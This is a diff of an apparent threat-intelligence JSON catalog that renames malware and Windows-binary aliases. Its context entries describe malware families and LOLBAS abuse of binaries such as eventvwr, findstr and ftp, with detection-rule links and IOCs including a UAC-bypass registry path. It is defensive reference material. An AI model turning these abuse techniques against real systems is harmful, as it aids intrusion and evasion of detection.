"uuid": "55859df1-5c3b-4b9b-b0d0-39c5c82c59f9", - "value": "EmPyre" + "value": "EmPyre - Associated Software" }, { "description": "[[Github PowerShell Empire](https://app.tidalcyber.com/references/017ec673-454c-492a-a65b-10d3a20dfdab)]", @@ -9274,7 +9274,7 @@ } ], "uuid": "8745d0f6-8771-4588-bd2f-b80d418908ee", - "value": "PowerShell Empire" + "value": "PowerShell Empire - Associated Software" }, { "description": "[Empire](https://app.tidalcyber.com/software/fea655ac-558f-4dd0-867f-9a5553626207) is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) for Windows and Python for Linux/macOS. [Empire](https://app.tidalcyber.com/software/fea655ac-558f-4dd0-867f-9a5553626207) was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.[[NCSC Joint Report Public Tools](https://app.tidalcyber.com/references/601d88c5-4789-4fa8-a9ab-abc8137f061c)][[Github PowerShell Empire](https://app.tidalcyber.com/references/017ec673-454c-492a-a65b-10d3a20dfdab)][[GitHub ATTACK Empire](https://app.tidalcyber.com/references/b3d6bb33-2b23-4c0a-b8fa-e002a5c7edfc)]", @@ -9421,7 +9421,7 @@ } ], "uuid": "c9f72733-1557-4a9c-9a07-b87e80d84b01", - "value": "Tavdig" + "value": "Tavdig - Associated Software" }, { "description": "[[Kaspersky Turla](https://app.tidalcyber.com/references/535e9f1a-f89e-4766-a290-c5b8100968f8)]", @@ -9435,7 +9435,7 @@ } ], "uuid": "b0614725-7a40-4a46-9d57-79dfd157af91", - "value": "Wipbot" + "value": "Wipbot - Associated Software" }, { "description": "[[Kaspersky Turla](https://app.tidalcyber.com/references/535e9f1a-f89e-4766-a290-c5b8100968f8)]", @@ -9449,7 +9449,7 @@ } ], "uuid": "40bd7e6b-f282-4fac-a707-e21b256e0c52", - "value": "WorldCupSec" + "value": "WorldCupSec - Associated Software" }, { "description": "[[Kaspersky Turla](https://app.tidalcyber.com/references/535e9f1a-f89e-4766-a290-c5b8100968f8)]", @@ -9463,7 +9463,7 @@ } ], "uuid": "eafca858-2534-4dea-b50c-ddf9a9a490f8", - "value": "TadjMakhal" + "value": "TadjMakhal - Associated Software" }, { "description": "[Epic](https://app.tidalcyber.com/software/a7e71387-b276-413c-a0de-4cf07e39b158) is a backdoor that has been used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2). [[Kaspersky Turla](https://app.tidalcyber.com/references/535e9f1a-f89e-4766-a290-c5b8100968f8)]", @@ -9521,7 +9521,7 @@ } ], "uuid": "285440ba-037a-4b5c-a089-e0af02a62236", - "value": "esentutl.exe" + "value": "esentutl.exe - Associated Software" }, { "description": "[esentutl](https://app.tidalcyber.com/software/a7589733-6b04-4215-a4e7-4b62cd4610fa) is a command-line tool that provides database utilities for the Windows Extensible Storage Engine.[[Microsoft Esentutl](https://app.tidalcyber.com/references/08fb9e84-495f-4710-bd1e-417eb8191a10)]", @@ -9575,7 +9575,7 @@ } ], "uuid": "51125aee-d1af-4414-90fa-84b6c977c100", - "value": "Eventvwr.exe" + "value": "Eventvwr.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Displays Windows Event Logs in a GUI window.\n\n**Author:** Jacob Gajek\n\n**Paths:**\n* C:\\Windows\\System32\\eventvwr.exe\n* C:\\Windows\\SysWOW64\\eventvwr.exe\n\n**Resources:**\n* [https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/](https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/)\n* [https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1](https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1)\n* [https://twitter.com/orange_8361/status/1518970259868626944](https://twitter.com/orange_8361/status/1518970259868626944)\n\n**Detection:**\n* Sigma: [proc_creation_win_uac_bypass_eventvwr.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml)\n* Sigma: [registry_set_uac_bypass_eventvwr.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml)\n* Sigma: [file_event_win_uac_bypass_eventvwr.yml](https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml)\n* Elastic: [privilege_escalation_uac_bypass_event_viewer.toml](https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml)\n* Splunk: [eventvwr_uac_bypass.yml](https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml)\n* IOC: eventvwr.exe launching child process other than mmc.exe\n* IOC: Creation or modification of the registry value HKCU\\Software\\Classes\\mscfile\\shell\\open\\command[[Eventvwr.exe - LOLBAS Project](/references/0c09812a-a936-4282-b574-35a00f631857)]", @@ -9774,7 +9774,7 @@ } ], "uuid": "a878dcfe-76d9-435d-8b14-b0490db7e1a8", - "value": "Excel.exe" + "value": "Excel.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft Office binary\n\n**Author:** Reegun J (OCBC Bank)\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Excel.exe\n* C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Excel.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office16\\Excel.exe\n* C:\\Program Files\\Microsoft Office\\Office16\\Excel.exe\n* C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Excel.exe\n* C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Excel.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office15\\Excel.exe\n* C:\\Program Files\\Microsoft Office\\Office15\\Excel.exe\n* C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Excel.exe\n* C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Excel.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office14\\Excel.exe\n* C:\\Program Files\\Microsoft Office\\Office14\\Excel.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office12\\Excel.exe\n* C:\\Program Files\\Microsoft Office\\Office12\\Excel.exe\n* C:\\Program Files\\Microsoft Office\\Office12\\Excel.exe\n\n**Resources:**\n* [https://twitter.com/reegun21/status/1150032506504151040](https://twitter.com/reegun21/status/1150032506504151040)\n* [https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191](https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_office.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml)\n* IOC: Suspicious Office application Internet/network traffic[[Excel.exe - LOLBAS Project](/references/9a2458f7-63ca-4eca-8c61-b6098ec0798f)]", @@ -9841,7 +9841,7 @@ } ], "uuid": "7ffda0fe-4375-443e-a8c7-df5dabc104f9", - "value": "Expand.exe" + "value": "Expand.exe - Associated Software" }, { "description": "[Expand](https://app.tidalcyber.com/software/5d7a39e3-c667-45b3-987e-3b0ca49cff61) is a Windows utility used to expand one or more compressed CAB files.[[Microsoft Expand Utility](https://app.tidalcyber.com/references/bf73a375-87b7-4603-8734-9f3d8d11967e)] It has been used by [BBSRAT](https://app.tidalcyber.com/software/be4dab36-d499-4ac3-b204-5e309e3a5331) to decompress a CAB file into executable content.[[Palo Alto Networks BBSRAT](https://app.tidalcyber.com/references/8c5d61ba-24c5-4f6c-a208-e0a5d23ebb49)]", @@ -9887,7 +9887,7 @@ } ], "uuid": "f6b34f5e-3bec-4098-98b8-2ea74f184ecc", - "value": "Explorer.exe" + "value": "Explorer.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary used for managing files and system components within Windows\n\n**Author:** Jai Minton\n\n**Paths:**\n* C:\\Windows\\explorer.exe\n* C:\\Windows\\SysWOW64\\explorer.exe\n\n**Resources:**\n* [https://twitter.com/CyberRaiju/status/1273597319322058752?s=20](https://twitter.com/CyberRaiju/status/1273597319322058752?s=20)\n* [https://twitter.com/bohops/status/1276356245541335048](https://twitter.com/bohops/status/1276356245541335048)\n* [https://twitter.com/bohops/status/986984122563391488](https://twitter.com/bohops/status/986984122563391488)\n\n**Detection:**\n* Sigma: [proc_creation_win_explorer_break_process_tree.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml)\n* Sigma: [proc_creation_win_explorer_lolbin_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_lolbin_execution.yml)\n* Elastic: [initial_access_via_explorer_suspicious_child_parent_args.toml](https://github.com/elastic/detection-rules/blob/f2bc0c685d83db7db395fc3dc4b9729759cd4329/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml)\n* IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line is suspicious.[[Explorer.exe - LOLBAS Project](/references/9ba3d54c-02d1-45bd-bfe8-939e84d9d44b)]", @@ -9962,7 +9962,7 @@ } ], "uuid": "ef321c97-a66d-4dbc-8ed6-c002e141ffdc", - "value": "Extexport.exe" + "value": "Extexport.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Load a DLL located in the c:\\test folder with a specific name.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Program Files\\Internet Explorer\\Extexport.exe\n* C:\\Program Files (x86)\\Internet Explorer\\Extexport.exe\n\n**Resources:**\n* [http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/](http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_extexport.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml)\n* IOC: Extexport.exe loads dll and is execute from other folder the original path[[Extexport.exe - LOLBAS Project](/references/2aa09a10-a492-4753-bbd8-aacd31e4fee3)]", @@ -10037,7 +10037,7 @@ } ], "uuid": "84483c62-922d-49c5-b688-c106c2496545", - "value": "Extrac32.exe" + "value": "Extrac32.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Extract to ADS, copy or overwrite a file with Extrac32.exe\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\extrac32.exe\n* C:\\Windows\\SysWOW64\\extrac32.exe\n\n**Resources:**\n* [https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/](https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/)\n* [https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)\n* [https://twitter.com/egre55/status/985994639202283520](https://twitter.com/egre55/status/985994639202283520)\n\n**Detection:**\n* Elastic: [defense_evasion_misc_lolbin_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml)\n* Sigma: [proc_creation_win_lolbin_extrac32.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml)\n* Sigma: [proc_creation_win_lolbin_extrac32_ads.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml)[[Extrac32.exe - LOLBAS Project](/references/ae632afc-336c-488e-81f6-91ffe1829595)]", @@ -10181,7 +10181,7 @@ } ], "uuid": "78026ff0-63f0-42d8-81de-e02ad8223d68", - "value": "GreyEnergy mini" + "value": "GreyEnergy mini - Associated Software" }, { "description": "[FELIXROOT](https://app.tidalcyber.com/software/4b1a07cd-4c1f-4d93-a454-07fd59b3039a) is a backdoor that has been used to target Ukrainian victims. [[FireEye FELIXROOT July 2018](https://app.tidalcyber.com/references/501057e2-9a31-46fe-aaa0-427218682153)]", @@ -10329,7 +10329,7 @@ } ], "uuid": "8c3183d9-da91-449e-94e5-1814bec72c1b", - "value": "Findstr.exe" + "value": "Findstr.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Write to ADS, discover, or download files with Findstr.exe\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\findstr.exe\n* C:\\Windows\\SysWOW64\\findstr.exe\n\n**Resources:**\n* [https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/](https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/)\n* [https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_findstr.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml)[[Findstr.exe - LOLBAS Project](/references/fc4b7b28-ac74-4a8f-a39d-ce55df5fca08)]", @@ -10378,7 +10378,7 @@ } ], "uuid": "132b2577-e54e-49d4-8579-963dea48bd6a", - "value": "FinSpy" + "value": "FinSpy - Associated Software" }, { "description": "[FinFisher](https://app.tidalcyber.com/software/41f54ce1-842c-428a-977f-518a5b63b4d7) is a government-grade commercial surveillance spyware reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. It is heavily obfuscated and uses multiple anti-analysis techniques. It has other variants including [Wingbird](https://app.tidalcyber.com/software/3e70078f-407e-4b03-b604-bdc05b372f37). [[FinFisher Citation](https://app.tidalcyber.com/references/6ef0b8d8-ba98-49ce-807d-5a85d111b027)] [[Microsoft SIR Vol 21](https://app.tidalcyber.com/references/619b9cf8-7201-45de-9c36-834ccee356a9)] [[FireEye FinSpy Sept 2017](https://app.tidalcyber.com/references/142cf7a3-2ca2-4cf3-b95a-9f4b3bc1cdce)] [[Securelist BlackOasis Oct 2017](https://app.tidalcyber.com/references/66121c37-6b66-4ab2-9f63-1adb80dcec62)] [[Microsoft FinFisher March 2018](https://app.tidalcyber.com/references/88c97a9a-ef14-4695-bde0-9de2b5f5343b)]", @@ -10424,7 +10424,7 @@ } ], "uuid": "44e3833b-bf22-4adb-9986-95f4e8898f21", - "value": "Finger.exe" + "value": "Finger.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Displays information about a user or users on a specified remote computer that is running the Finger service or daemon\n\n**Author:** Ruben Revuelta\n\n**Paths:**\n* c:\\windows\\system32\\finger.exe\n* c:\\windows\\syswow64\\finger.exe\n\n**Resources:**\n* [https://twitter.com/DissectMalware/status/997340270273409024](https://twitter.com/DissectMalware/status/997340270273409024)\n* [https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11))\n\n**Detection:**\n* Sigma: [proc_creation_win_finger_usage.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_finger_usage.yml)\n* IOC: finger.exe should not be run on a normal workstation.\n* IOC: finger.exe connecting to external resources.[[Finger.exe - LOLBAS Project](/references/e32d01eb-d904-43dc-a7e2-bdcf42f3ebb2)]", @@ -10524,7 +10524,7 @@ } ], "uuid": "4a135c64-23dd-4850-8484-d9805d3663b5", - "value": "Flamer" + "value": "Flamer - Associated Software" }, { "description": "[[Kaspersky Flame](https://app.tidalcyber.com/references/6db8f76d-fe38-43b1-ad85-ad372da9c09d)] [[Crysys Skywiper](https://app.tidalcyber.com/references/ea35f530-b0fd-4e27-a7a9-6ba41566154c)]", @@ -10538,7 +10538,7 @@ } ], "uuid": "9a1c376d-6ef8-4d18-a4ff-e28751d30ae1", - "value": "sKyWIper" + "value": "sKyWIper - Associated Software" }, { "description": "[Flame](https://app.tidalcyber.com/software/87604333-638f-4f4a-94e0-16aa825dd5b8) is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. [[Kaspersky Flame](https://app.tidalcyber.com/references/6db8f76d-fe38-43b1-ad85-ad372da9c09d)]", @@ -10640,7 +10640,7 @@ } ], "uuid": "c6731561-3f22-451d-adf8-4b80ef07ce65", - "value": "BARBWIRE" + "value": "BARBWIRE - Associated Software" }, { "description": "[[The DFIR Report Truebot June 12 2023](/references/a6311a66-bb36-4cad-a98f-2b0b89aafa3d)]", @@ -10656,7 +10656,7 @@ } ], "uuid": "70bf0820-6ce7-4877-a668-6583aef5a4c2", - "value": "GraceWire" + "value": "GraceWire - Associated Software" }, { "description": "[FlawedGrace](https://app.tidalcyber.com/software/c558e948-c817-4494-a95d-ad3207f10e26) is a fully featured remote access tool (RAT) written in C++ that was first observed in late 2017.[[Proofpoint TA505 Jan 2019](https://app.tidalcyber.com/references/b744f739-8810-4fb9-96e3-6488f9ed6305)]", @@ -10711,7 +10711,7 @@ } ], "uuid": "6f5b39e8-5c52-478c-b9f6-89822c43d859", - "value": "Commander" + "value": "Commander - Associated Software" }, { "description": "FleetDeck is a commercial remote monitoring and management (RMM) tool that enables remote desktop access and “virtual terminal” capabilities. Government and commercial reports indicate that financially motivated adversaries, including BlackCat (AKA ALPHV or Noberus) actors and Scattered Spider (AKA 0ktapus or UNC3944), have used FleetDeck for command and control and persistence purposes during intrusions.[[Cyber Centre ALPHV/BlackCat July 25 2023](/references/610c8f22-1a96-42d2-934d-8467d136eed2)][[CrowdStrike Scattered Spider SIM Swapping December 22 2022](/references/e48760ba-2752-4d30-8f99-152c81f63017)]", @@ -10786,7 +10786,7 @@ } ], "uuid": "91939985-db0a-4ba9-9fd7-9785615cc0f4", - "value": "fltMC.exe" + "value": "fltMC.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Filter Manager Control Program used by Windows\n\n**Author:** John Lambert\n\n**Paths:**\n* C:\\Windows\\System32\\fltMC.exe\n\n**Resources:**\n* [https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon](https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon)\n\n**Detection:**\n* Sigma: [proc_creation_win_fltmc_unload_driver_sysmon.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml)\n* Elastic: [defense_evasion_via_filter_manager.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_via_filter_manager.toml)\n* Splunk: [unload_sysmon_filter_driver.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/unload_sysmon_filter_driver.yml)\n* IOC: 4688 events with fltMC.exe[[fltMC.exe - LOLBAS Project](/references/cf9b4bd3-92f0-405b-85e7-95e65d548b79)]", @@ -10857,7 +10857,7 @@ } ], "uuid": "f283d74b-b2fe-4974-8dc2-d33c93575b2a", - "value": "Forfiles.exe" + "value": "Forfiles.exe - Associated Software" }, { "description": "[Forfiles](https://app.tidalcyber.com/software/c6dc67a6-587d-4700-a7de-bee043a0031a) is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts. [[Microsoft Forfiles Aug 2016](https://app.tidalcyber.com/references/fd7eaa47-3512-4dbd-b881-bc679d06cd1b)]", @@ -10906,7 +10906,7 @@ } ], "uuid": "ebc42f24-1194-4e44-baa2-50dfa222162e", - "value": "Trinity" + "value": "Trinity - Associated Software" }, { "description": "[FrameworkPOS](https://app.tidalcyber.com/software/aef7cbbc-5163-419c-8e4b-3f73bed50474) is a point of sale (POS) malware used by [FIN6](https://app.tidalcyber.com/groups/fcaadc12-7c17-4946-a9dc-976ed610854c) to steal payment card data from sytems that run physical POS devices.[[SentinelOne FrameworkPOS September 2019](https://app.tidalcyber.com/references/054d7827-3d0c-40a7-b2a0-1428ad7729ea)]", @@ -11002,7 +11002,7 @@ } ], "uuid": "33c9b15d-da72-49ab-b5a3-918c93ea5208", - "value": "Fsi.exe" + "value": "Fsi.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.\n\n**Author:** Jimmy (@bohops)\n\n**Paths:**\n* C:\\Program Files\\dotnet\\sdk\\[sdk version]\\FSharp\\fsi.exe\n* C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsi.exe\n\n**Resources:**\n* [https://twitter.com/NickTyrer/status/904273264385589248](https://twitter.com/NickTyrer/status/904273264385589248)\n* [https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/](https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/)\n\n**Detection:**\n* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* IOC: Fsi.exe execution may be suspicious on non-developer machines\n* Sigma: [proc_creation_win_lolbin_fsharp_interpreters.yml](https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml)[[Fsi.exe - LOLBAS Project](/references/4e14e87f-2ad9-4959-8cb2-8585b67931c0)]", @@ -11053,7 +11053,7 @@ } ], "uuid": "0c8284cf-4e6f-4660-9381-76c08e0a6244", - "value": "FsiAnyCpu.exe" + "value": "FsiAnyCpu.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** 32/64-bit FSharp (F#) Interpreter included with Visual Studio.\n\n**Author:** Jimmy (@bohops)\n\n**Paths:**\n* c:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsianycpu.exe\n\n**Resources:**\n* [https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/](https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/)\n\n**Detection:**\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines\n* Sigma: [proc_creation_win_lolbin_fsharp_interpreters.yml](https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml)[[FsiAnyCpu.exe - LOLBAS Project](/references/87031d31-b6d7-4860-b11b-5a0dc8774d92)]", @@ -11096,7 +11096,7 @@ } ], "uuid": "142b3451-bb26-4bb2-8d22-58cccd0f52ee", - "value": "Fsutil.exe" + "value": "Fsutil.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** File System Utility\n\n**Author:** Elliot Killick\n\n**Paths:**\n* C:\\Windows\\System32\\fsutil.exe\n* C:\\Windows\\SysWOW64\\fsutil.exe\n\n**Resources:**\n* [https://twitter.com/0gtweet/status/1720724516324704404](https://twitter.com/0gtweet/status/1720724516324704404)\n\n**Detection:**\n* IOC: fsutil.exe should not be run on a normal workstation\n* IOC: file setZeroData (not case-sensitive) in the process arguments\n* IOC: Sysmon Event ID 1\n* IOC: Execution of process fsutil.exe with trace decode could be suspicious\n* IOC: Non-Windows netsh.exe execution\n* Sigma: [proc_creation_win_susp_fsutil_usage.yml](https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml)[[Fsutil.exe - LOLBAS Project](/references/e2305dac-4245-4fac-8813-69cb210e9cd3)]", @@ -11137,7 +11137,7 @@ } ], "uuid": "4cce70d6-bf60-4943-9342-a9f3f306aea0", - "value": "ftp.exe" + "value": "ftp.exe - Associated Software" }, { "description": "[ftp](https://app.tidalcyber.com/software/062deac9-8f05-44e2-b347-96b59ba166ca) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data.[[Microsoft FTP](https://app.tidalcyber.com/references/970f8d16-f5b7-44e2-b81f-738b931c60d9)][[Linux FTP](https://app.tidalcyber.com/references/021ea6bc-abff-48de-a6bb-315dbbfa6147)]", @@ -11228,7 +11228,7 @@ } ], "uuid": "b9e7470c-e179-4efd-b472-ba146d8cf8fa", - "value": "DILLJUICE stage2" + "value": "DILLJUICE stage2 - Associated Software" }, { "description": "[FYAnti](https://app.tidalcyber.com/software/be9a2ae5-373a-4dee-9c1e-b54235dafed0) is a loader that has been used by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) since at least 2020, including to deploy [QuasarRAT](https://app.tidalcyber.com/software/4bab7c2b-5ec4-467e-8df4-f2e6996e136b).[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]", @@ -11299,7 +11299,7 @@ } ], "uuid": "24e22e4a-0c90-48e6-94ed-f212b21f7212", - "value": "WhiteBear" + "value": "WhiteBear - Associated Software" }, { "description": 